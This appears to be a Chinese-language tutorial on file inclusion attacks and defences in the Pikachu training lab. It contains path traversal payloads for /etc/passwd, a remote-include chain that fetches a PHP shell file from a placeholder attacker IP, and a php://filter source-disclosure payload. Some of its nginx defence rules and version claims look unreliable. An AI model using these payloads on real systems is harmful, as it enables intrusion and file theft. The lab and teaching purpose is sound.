Pikachu靶场实战：文件包含漏洞(File Inclusion)的攻防演练

1. 文件包含漏洞基础认知

第一次接触文件包含漏洞时，我也被这个看似简单的功能背后隐藏的风险震惊了。想象你家的智能门锁系统，本来只能识别特定几位家庭成员的指纹（白名单机制），但如果锁具设计存在缺陷，攻击者就能用任意指纹解锁（恶意文件包含），甚至远程复制管理员指纹（远程文件执行）。这就是文件包含漏洞的可怕之处。

PHP开发中常见的四个包含函数就像四把不同的钥匙：

• include()：尝试包含文件，失败时仅抛出警告
• include_once()：同上，但会检查是否已包含过
• require()：严格模式，失败时直接终止脚本
• require_once()：严格版去重检查

去年某电商平台漏洞报告中，攻击者正是利用未过滤的include()函数，通过构造?config=../../admin/db.ini这样的参数，直接盗取了数据库凭证。我在本地复现这个案例时发现，当PHP的allow_url_include配置开启时，危害会指数级上升——攻击者甚至可以直接包含托管在云存储上的恶意脚本。

2. 本地文件包含实战演练

2.1 Pikachu靶场环境搭建

建议使用Docker快速部署：

docker pull area39/pikachu docker run -d -p 8080:80 area39/pikachu

访问http://localhost:8080后，你会看到篮球明星展示页面。右键查看源码会发现下拉菜单的值对应file1.php到file5.php，这就是典型的动态包含场景。

2.2 目录穿越攻击手法

尝试修改URL参数为：

http://localhost:8080/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd

我在Ubuntu测试机上用这个payload成功读取了系统用户列表。Windows环境下可以尝试包含：

?filename=../../../../Windows/win.ini

关键技巧在于观察报错信息。当故意输入错误文件名时，系统暴露出真实路径C:\xampp\htdocs\pikachu\...，这为构造精确的路径穿越提供了坐标。

2.3 防御方案深度优化

原始白名单方案存在维护成本高的问题，我改进后的版本使用正则匹配：

$safe_pattern = '/^file[1-5]\.php$/'; if(!preg_match($safe_pattern, $_GET['filename'])) { header("HTTP/1.1 403 Forbidden"); exit; }

同时建议在php.ini中配置：

open_basedir = /var/www/html/pikachu/ disable_functions = exec,system

3. 远程文件包含高阶利用

3.1 攻击链构造技巧

在虚拟机中搭建临时web服务：

python3 -m http.server 8000

然后创建包含PHP代码的txt文件：

<?php system("whoami"); ?>

触发远程包含：

http://localhost:8080/vul/fileinclude/fi_remote.php?filename=http://攻击者IP:8000/shell.txt

实测发现这种攻击成功率取决于三个因素：

1. 目标服务器出网权限
2. PHP版本（5.x默认允许远程包含）
3. allow_url_fopen配置状态

3.2 多层防御体系构建

企业级防护我推荐组合拳：

1. Web应用防火墙规则：

location ~* \.(php|inc|log)$ { deny all; }

2. 动态文件签名校验：

$file_hash = [ 'file1.php' => 'a1b2c3...', //... ]; if(!hash_equals($file_hash[$filename], hash_file('sha256', $path))){ die("文件被篡改！"); }

3. 实时监控敏感目录的读写操作

4. 企业级防护方案落地

4.1 安全开发生命周期

在我参与过的金融项目中，我们要求开发团队：

• 代码审查时必须检查所有包含函数
• 使用静态分析工具扫描历史代码
• 对用户输入的参数实施三级过滤：
  1. 入口处统一转义
  2. 业务逻辑层白名单校验
  3. 数据库操作前参数化查询

4.2 应急响应预案

建立漏洞响应SOP：

1. 立即禁用相关功能模块
2. 审计日志分析攻击路径
3. 回滚到安全版本
4. 更新WAF规则拦截攻击特征

有一次凌晨2点收到告警，发现攻击者尝试包含/proc/self/environ文件。我们通过分析访问日志，发现对方使用../超过8次的异常请求，及时封禁了源IP。

5. 新型攻击手法防御

最近出现利用PHP流包装器的攻击：

?filename=php://filter/convert.base64-encode/resource=config.php

防御方法是在nginx中添加：

location ~* \.(php|phar|zip):// { return 403; }

对于云环境，建议启用：

• 文件完整性监控（FIM）
• 容器镜像签名验证
• 最小权限IAM策略

记得去年给某客户做渗透测试时，发现他们虽然做了白名单限制，但开发人员为了方便调试留下了test.php后门文件。这个案例告诉我们，安全防护必须覆盖到开发运维的全流程。